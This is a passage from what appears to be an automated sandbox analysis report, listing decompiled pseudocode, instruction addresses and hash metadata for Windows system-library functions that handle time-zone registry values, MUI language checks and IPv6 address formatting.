						if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                0x00a58788
                                0x00a58788
                                0x00a58791
                                0x00a58794
                                0x00a58798
                                0x00a5879b
                                0x00a5879e
                                0x00a587a1
                                0x00a587a4
                                0x00a587a7
                                0x00a587aa
                                0x00a587af
                                0x00aa1ad3
                                0x00a58b0a
                                0x00a58b0d
                                0x00a58b13
                                0x00a58b19
                                0x00a58b1f
                                0x00a58b25
                                0x00a58b2b
                                0x00a58b31
                                0x00a58b37
                                0x00a58b3d
                                0x00a58b46
                                0x00a58b46
                                0x00a587c6
                                0x00a587d0
                                0x00aa1ae0
                                0x00aa1ae6
                                0x00aa1af8
                                0x00aa1af8
                                0x00aa1afd
                                0x00aa1afe
                                0x00aa1b01
                                0x00aa1b06
                                0x00aa1b06
                                0x00a587d6
                                0x00a587f2
                                0x00a587f7
                                0x00a58807
                                0x00a5880a
                                0x00a5880f
                                0x00a58810
                                0x00a58813
                                0x00a58818
                                0x00a58818
                                0x00a5882c
                                0x00a58831
                                0x00a58838
                                0x00a58908
                                0x00a58920
                                0x00a589f0
                                0x00a58a08
                                0x00a58af6
                                0x00a58af6
                                0x00a58af8
                                0x00a58afb
                                0x00aa1beb
                                0x00aa1beb
                                0x00a58b04
                                0x00aa1bf8
                                0x00aa1c0e
                                0x00aa1c13
                                0x00aa1c16
                                0x00aa1c16
                                0x00aa1bf8
                                0x00000000
                                0x00a58b04
                                0x00a58a0e
                                0x00a58a11
                                0x00a58a14
                                0x00a58a15
                                0x00a58a18
                                0x00a58a22
                                0x00a58b59
                                0x00a58a28
                                0x00a58a3c
                                0x00a58a3c
                                0x00a58a42
                                0x00aa1bb0
                                0x00aa1b11
                                0x00aa1b11
                                0x00000000
                                0x00a58a48
                                0x00a58a51
                                0x00a58a5b
                                0x00a58a5e
                                0x00a58a61
                                0x00a58a69
                                0x00a58a69
                                0x00a58a6d
                                0x00000000
                                0x00000000
                                0x00a58a74
                                0x00a58a7c
                                0x00a58a7d
                                0x00a58a91
                                0x00a58a93
                                0x00a58a93
                                0x00a58a98
                                0x00a58a9b
                                0x00a58aa1
                                0x00a58aa1
                                0x00a58aa4
                                0x00a58aaa
                                0x00a58ab1
                                0x00a58ac5
                                0x00a58ac7
                                0x00a58ac7
                                0x00a58ac5
                                0x00a58ace
                                0x00aa1bc9
                                0x00aa1bce
                                0x00aa1bd2
                                0x00aa1bd2
                                0x00a58ad8
                                0x00a58aeb
                                0x00a58aeb
                                0x00a58af0
                                0x00a58af4
                                0x00000000
                                0x00a58af4
                                0x00a58a42
                                0x00a58926
                                0x00a58929
                                0x00a5892c
                                0x00a5892d
                                0x00a58930
                                0x00a58935
                                0x00a5893a
                                0x00a58b51
                                0x00a58940
                                0x00a58954
                                0x00a58954
                                0x00a5895a
                                0x00aa1b63
                                0x00000000
                                0x00a58960
                                0x00a58969
                                0x00a58973
                                0x00a58976
                                0x00a58979
                                0x00a5897e
                                0x00a58981
                                0x00a58981
                                0x00a58986
                                0x00000000
                                0x00000000
                                0x00aa1b6e
                                0x00aa1b74
                                0x00aa1b7b
                                0x00aa1b8f
                                0x00aa1b91
                                0x00aa1b91
                                0x00aa1b99
                                0x00aa1b9c
                                0x00aa1ba2
                                0x00aa1ba2
                                0x00a5898c
                                0x00a58992
                                0x00a58999
                                0x00a589ad
                                0x00aa1ba8
                                0x00aa1ba8
                                0x00a589ad
                                0x00a589b6
                                0x00a589c8
                                0x00a589cd
                                0x00a589d0
                                0x00a589d0
                                0x00a589d6
                                0x00a589e8
                                0x00a589e8
                                0x00a589ed
                                0x00000000
                                0x00a589ed
                                0x00a5895a
                                0x00a5883e
                                0x00a58841
                                0x00a58844
                                0x00a58845
                                0x00a58848
                                0x00a5884d
                                0x00a58852
                                0x00a58b49
                                0x00a58858
                                0x00a5886c
                                0x00a5886c
                                0x00a58872
                                0x00aa1b0e
                                0x00000000
                                0x00a58878
                                0x00a58881
                                0x00a5888b
                                0x00a5888e
                                0x00a58891
                                0x00a58896
                                0x00a58899
                                0x00a58899
                                0x00a5889e
                                0x00000000
                                0x00000000
                                0x00aa1b21
                                0x00aa1b27
                                0x00aa1b2e
                                0x00aa1b42
                                0x00aa1b44
                                0x00aa1b44
                                0x00aa1b4c
                                0x00aa1b4f
                                0x00aa1b55
                                0x00aa1b55
                                0x00a588a4
                                0x00a588aa
                                0x00a588b1
                                0x00a588c5
                                0x00aa1b5b
                                0x00aa1b5b
                                0x00a588c5
                                0x00a588ce
                                0x00a588e0
                                0x00a588e5
                                0x00a588e8
                                0x00a588e8
                                0x00a588ee
                                0x00a58900
                                0x00a58900
                                0x00a58905
                                0x00000000
                                0x00a58905

                                APIs
                                Strings
                                • Kernel-MUI-Language-SKU, xrefs: 00A589FC
                                • Kernel-MUI-Language-Allowed, xrefs: 00A58827
                                • Kernel-MUI-Number-Allowed, xrefs: 00A587E6
                                • WindowsExcludedProcs, xrefs: 00A587C1
                                • Kernel-MUI-Language-Disallowed, xrefs: 00A58914
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcspbrk
                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                • API String ID: 402402107-258546922
                                • Opcode ID: f50bc613d2a92da2911f3db046a0dafcc07fa9fc922d755f8133be2ec315fbdc
                                • Instruction ID: 21875c0995fb2fcff49983cf42e40cee2a1e47ce98e4463feebb6a0803876379
                                • Opcode Fuzzy Hash: f50bc613d2a92da2911f3db046a0dafcc07fa9fc922d755f8133be2ec315fbdc
                                • Instruction Fuzzy Hash: FCF1C5B2D00209EFCF11DFA5CA819EEB7B9FF08301F15446AE905B7251EB359A45DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00AC822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                Download Yara Rule
                                C-Code - Quality: 95%
                                			E00AC822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E00AE5A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E00AE5A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E00A87DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E00AC810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E00AC810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E00AC810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E00AC810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E00AC810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E00AC810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E00AC810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E00AC810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E00AC810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E00AC810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E00A2F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}













                                0x00ac8231
                                0x00ac8235
                                0x00ac823a
                                0x00ac8245
                                0x00ac824b
                                0x00ac825c
                                0x00ac8262
                                0x00ac8263
                                0x00ac8266
                                0x00ac8268
                                0x00000000
                                0x00ac826a
                                0x00ac8270
                                0x00ac8275
                                0x00ac8277
                                0x00ac8295
                                0x00ac8297
                                0x00ac838d
                                0x00ac8391
                                0x00ac83a9
                                0x00ac83ab
                                0x00ac83ad
                                0x00ac83b6
                                0x00ac83b9
                                0x00000000
                                0x00ac83b9
                                0x00ac829d
                                0x00ac829d
                                0x00ac82b6
                                0x00ac82b8
                                0x00000000
                                0x00ac82be
                                0x00ac82c0
                                0x00ac82d5
                                0x00ac82d7
                                0x00000000
                                0x00ac82dd
                                0x00ac82f3
                                0x00ac82f5
                                0x00000000
                                0x00ac82fb
                                0x00ac8317
                                0x00ac8319
                                0x00000000
                                0x00ac831b
                                0x00ac8332
                                0x00ac8334
                                0x00000000
                                0x00ac8336
                                0x00ac834f
                                0x00ac8351
                                0x00000000
                                0x00ac8353
                                0x00ac8353
                                0x00ac835a
                                0x00000000
                                0x00ac835c
                                0x00ac8378
                                0x00ac837a
                                0x00ac837c
                                0x00ac8385
                                0x00ac8388
                                0x00ac83bc
                                0x00ac83cf
                                0x00ac83cf
                                0x00ac837c
                                0x00ac835a
                                0x00ac8351
                                0x00ac8334
                                0x00ac8319
                                0x00ac82f5
                                0x00ac82d7
                                0x00ac82b8
                                0x00ac83d4
                                0x00ac83d9
                                0x00ac83d9
                                0x00ac8277
                                0x00ac824d
                                0x00ac824d
                                0x00ac824d
                                0x00ac824d
                                0x00ac83df

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsnlen
                                • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                • API String ID: 3628947076-1387797911
                                • Opcode ID: 2692bf65dea6713837e096c550db7d8f02ba61251a91b4cb0a7c99c98267d7f7
                                • Instruction ID: 7ed503bbcddb13fc32db9670cfb2f8269bfb08d3f11c980386fef2a0fd6d7563
                                • Opcode Fuzzy Hash: 2692bf65dea6713837e096c550db7d8f02ba61251a91b4cb0a7c99c98267d7f7
                                • Instruction Fuzzy Hash: E541E975340349BEEB029A91CE42FDF77ACBF05B44F110126BA00DA191DBB4DB008BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A713CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                Download Yara Rule
                                C-Code - Quality: 38%
                                			E00A713CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00A67707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa32926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00A67707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa39cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00A67707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00A67707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00A67707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00A67707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                0x00a713d5
                                0x00a713d9
                                0x00a713dc
                                0x00a713de
                                0x00a713e1
                                0x00a713e8
                                0x00a713ee
                                0x00a9e8fd
                                0x00000000
                                0x00a9e921
                                0x00a9e921
                                0x00a9e928
                                0x00a9e982
                                0x00a9e98a
                                0x00000000
                                0x00a9e99a
                                0x00a9e99e
                                0x00a9e9a3
                                0x00a9e9a8
                                0x00a9e9b9
                                0x00a9e978
                                0x00000000
                                0x00a9e978
                                0x00a9e98a
                                0x00a9e92a
                                0x00a9e931
                                0x00a9e944
                                0x00a9e944
                                0x00a9e950
                                0x00a9e954
                                0x00a9e959
                                0x00a9e95e
                                0x00a9e963
                                0x00a9e970
                                0x00000000
                                0x00a9e975
                                0x00a9e93b
                                0x00a9e980
                                0x00000000
                                0x00a9e980
                                0x00a9e942
                                0x00a9e94b
                                0x00000000
                                0x00a9e94b
                                0x00000000
                                0x00a9e942
                                0x00a713f4
                                0x00a713f4
                                0x00a713f9
                                0x00a713fc
                                0x00a713ff
                                0x00a71406
                                0x00a9e9cc
                                0x00a9e9d2
                                0x00a9e9d2
                                0x00a9e9cc
                                0x00a7140c
                                0x00a71411
                                0x00a71431
                                0x00a7143a
                                0x00a7143c
                                0x00a7143f
                                0x00a7143f
                                0x00a71442
                                0x00a71447
                                0x00a714a8
                                0x00a714ac
                                0x00a9e9e2
                                0x00a9e9e7
                                0x00a9e9ec
                                0x00a9ea05
                                0x00a9ea05
                                0x00000000
                                0x00a71449
                                0x00000000
                                0x00a71449
                                0x00a7144c
                                0x00a71459
                                0x00a71462
                                0x00a71469
                                0x00a7146a
                                0x00a71470
                                0x00a71473
                                0x00a71476
                                0x00a71476
                                0x00a71490
                                0x00a71495
                                0x00a7138e
                                0x00a71390
                                0x00a71397
                                0x00a71398
                                0x00a71399
                                0x00a713a1
                                0x00a713a4
                                0x00a713a4
                                0x00a71498
                                0x00a7149c
                                0x00a7149f
                                0x00a714a2
                                0x00000000
                                0x00000000
                                0x00a714a4
                                0x00000000
                                0x00a714a4
                                0x00a71413
                                0x00a71415
                                0x00a71416
                                0x00a71419
                                0x00a7141c
                                0x00a71422
                                0x00a713b7
                                0x00a713bc
                                0x00a713bf
                                0x00a713bf
                                0x00a713c2
                                0x00a71424
                                0x00a71424
                                0x00a71424
                                0x00a71427
                                0x00a7142b
                                0x00a7142c
                                0x00a7142c
                                0x00a7142c
                                0x00000000
                                0x00a7141c
                                0x00a71411

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: d3ae359e6c647fab4aaca658e78f338289d12bcdd21898cb2c1a4bf6e17d6d99
                                • Instruction ID: b0dc536dd426ad2e46ae51e498229ab2fc77156c9978d1adba5ae043c0768897
                                • Opcode Fuzzy Hash: d3ae359e6c647fab4aaca658e78f338289d12bcdd21898cb2c1a4bf6e17d6d99
                                • Instruction Fuzzy Hash: 3961F3B1A04655AACF34DF9DCC818BFBBF5EF94300B14C52DF4AA47641D674AA40DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00AD3B8E, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00AD3B8E(intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _t84;
				void* _t87;
				intOrPtr* _t97;
				void* _t104;
				void* _t106;
				void* _t109;
				intOrPtr _t116;
				signed int _t117;
				signed int _t122;
				signed int _t126;
				char _t127;
				signed int _t128;
				intOrPtr* _t133;
				void* _t134;

				_t133 = _a4;
				_t122 = 0;
				_t109 = _a8 + 0x2e;
				_v12 = 8;
				if( *_t133 != 0 ||  *((intOrPtr*)(_t133 + 2)) != 0 ||  *((intOrPtr*)(_t133 + 4)) != 0 ||  *((intOrPtr*)(_t133 + 6)) != 0 ||  *(_t133 + 0xc) == 0) {
					L17:
					_a4 = _t122;
					_v8 = _t122;
					_v16 = _t122;
					if(( *(_t133 + 8) & 0x0000fffd) == 0 &&  *(_t133 + 0xa) == 0xfe5e) {
						_v12 = 6;
					}
					_t127 = _v12;
					if(_t127 <= _t122) {
						L27:
						if(_a4 - _v8 <= 1) {
							_a4 = _t122;
							_v8 = _t122;
						}
						_t128 = 0;
						if(_v12 > _t122) {
							L33:
							L33:
							if(_v8 > _t128 || _t128 >= _a4) {
								if(_t128 != _t122 && _t128 != _a4) {
									_push(0xa39c7e);
									_push(_t109 - _a8);
									_push(_a8);
									_t87 = E00AE894A();
									_t134 = _t134 + 0xc;
									_a8 = _a8 + _t87;
								}
								_t84 = E00AE894A(_a8, _t109 - _a8, 0xa39c7a,  *(_t133 + _t128 * 2) & 0x0000ffff);
								_t134 = _t134 + 0x10;
								_a8 = _a8 + _t84;
							} else {
								_push(0xa39c80);
								_push(_t109 - _a8);
								_push(_a8);
								_a8 = _a8 + E00AE894A();
								_t134 = _t134 + 0xc;
								_t128 = _a4 - 1;
							}
							_t128 = _t128 + 1;
							if(_t128 < _v12) {
								goto L32;
							}
							goto L41;
							L32:
							_t122 = 0;
							goto L33;
						} else {
							L41:
							if(_v12 < 8) {
								_push( *(_t133 + 0xf) & 0x000000ff);
								_push( *(_t133 + 0xe) & 0x000000ff);
								_push( *(_t133 + 0xd) & 0x000000ff);
								_a8 = _a8 + E00AE894A(_a8, _t109 - _a8, ":%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							}
							return _a8;
						}
					} else {
						_t116 = 1;
						_t97 = _t133;
						_v20 = _t127;
						do {
							if( *_t97 != _t122) {
								_v16 = _t116;
							} else {
								if(_t116 - _v16 > _a4 - _v8) {
									_v8 = _v16;
									_a4 = _t116;
								}
								_t122 = 0;
							}
							_t97 = _t97 + 2;
							_t116 = _t116 + 1;
							_t40 =  &_v20;
							 *_t40 = _v20 - 1;
						} while ( *_t40 != 0);
						goto L27;
					}
				} else {
					_t126 =  *(_t133 + 8) & 0x0000ffff;
					if(_t126 != 0) {
						L13:
						if(_t126 != 0xffff ||  *(_t133 + 0xa) != 0) {
							_t122 = 0;
							goto L17;
						} else {
							_push( *(_t133 + 0xf) & 0x000000ff);
							_push( *(_t133 + 0xe) & 0x000000ff);
							_push( *(_t133 + 0xd) & 0x000000ff);
							_t104 = E00AE894A(_a8, _t109 - _a8, "::ffff:0:%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							L12:
							return _t104 + _a8;
						}
					}
					_t117 =  *(_t133 + 0xa) & 0x0000ffff;
					if(_t117 == 0) {
						L9:
						_t106 = 0xa32926;
						L11:
						_push( *(_t133 + 0xf) & 0x000000ff);
						_push( *(_t133 + 0xe) & 0x000000ff);
						_push( *(_t133 + 0xd) & 0x000000ff);
						_push( *(_t133 + 0xc) & 0x000000ff);
						_t104 = E00AE894A(_a8, _t109 - _a8, "::%hs%u.%u.%u.%u", _t106);
						goto L12;
					}
					if(_t117 != 0xffff) {
						goto L13;
					}
					if(_t117 != 0) {
						_t106 = 0xa39cac;
						goto L11;
					}
					goto L9;
				}
			}





















                                0x00ad3b9b
                                0x00ad3b9e
                                0x00ad3ba0
                                0x00ad3ba4
                                0x00ad3bae
                                0x00ad3c74
                                0x00ad3c79
                                0x00ad3c7c
                                0x00ad3c7f
                                0x00ad3c86
                                0x00ad3c93
                                0x00ad3c93
                                0x00ad3c9a
                                0x00ad3c9f
                                0x00ad3cd0
                                0x00ad3cd9
                                0x00ad3cdb
                                0x00ad3cde
                                0x00ad3cde
                                0x00ad3ce1
                                0x00ad3ce6
                                0x00000000
                                0x00ad3cf1
                                0x00ad3cf4
                                0x00ad3d1c
                                0x00ad3d28
                                0x00ad3d2d
                                0x00ad3d2e
                                0x00ad3d31
                                0x00ad3d36
                                0x00ad3d39
                                0x00ad3d39
                                0x00ad3d56
                                0x00ad3d5b
                                0x00ad3d5e
                                0x00ad3cfb
                                0x00ad3d00
                                0x00ad3d05
                                0x00ad3d06
                                0x00ad3d11
                                0x00ad3d14
                                0x00ad3d17
                                0x00ad3d17
                                0x00ad3d61
                                0x00ad3d65
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00ad3cef
                                0x00ad3cef
                                0x00000000
                                0x00ad3ce8
                                0x00ad3d67
                                0x00ad3d6b
                                0x00ad3d74
                                0x00ad3d79
                                0x00ad3d7e
                                0x00ad3d95
                                0x00ad3d95
                                0x00000000
                                0x00ad3d98
                                0x00ad3ca1
                                0x00ad3ca3
                                0x00ad3ca4
                                0x00ad3ca6
                                0x00ad3ca9
                                0x00ad3cac
                                0x00ad3cea
                                0x00ad3cae
                                0x00ad3cbb
                                0x00ad3cc0
                                0x00ad3cc3
                                0x00ad3cc3
                                0x00ad3cc6
                                0x00ad3cc6
                                0x00ad3cc9
                                0x00ad3cca
                                0x00ad3ccb
                                0x00ad3ccb
                                0x00ad3ccb
                                0x00000000
                                0x00ad3ca9
                                0x00ad3bdc
                                0x00ad3bdc
                                0x00ad3be8
                                0x00ad3c3c
                                0x00ad3c3f
                                0x00ad3c72
                                0x00000000
                                0x00ad3c48
                                0x00ad3c4f
                                0x00ad3c54
                                0x00ad3c59
                                0x00ad3c68
                                0x00ad3c34
                                0x00000000
                                0x00ad3c34
                                0x00ad3c3f
                                0x00ad3bea
                                0x00ad3bf1
                                0x00ad3bff
                                0x00ad3bff
                                0x00ad3c0b
                                0x00ad3c12
                                0x00ad3c17
                                0x00ad3c1c
                                0x00ad3c21
                                0x00ad3c2c
                                0x00000000
                                0x00ad3c31
                                0x00ad3bf8
                                0x00000000
                                0x00000000
                                0x00ad3bfd
                                0x00ad3c06
                                0x00000000
                                0x00ad3c06
                                0x00000000
                                0x00ad3bfd

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: b16a2433bfa1e0b67d8ef8dba40e2cb16d1e67d70d2fc0e928b673a8e4d399bd
                                • Instruction ID: a4ffe35623b55663a68f9bb6682def8f8e8577f6f58a62246f3f1245c6e8ae7a
                                • Opcode Fuzzy Hash: b16a2433bfa1e0b67d8ef8dba40e2cb16d1e67d70d2fc0e928b673a8e4d399bd
                                • Instruction Fuzzy Hash: 6D61A1B7910648BFCF20DF59C9404BE7BF5EF54310B14C52AF8AAA7241E274EB449B62
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A67EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
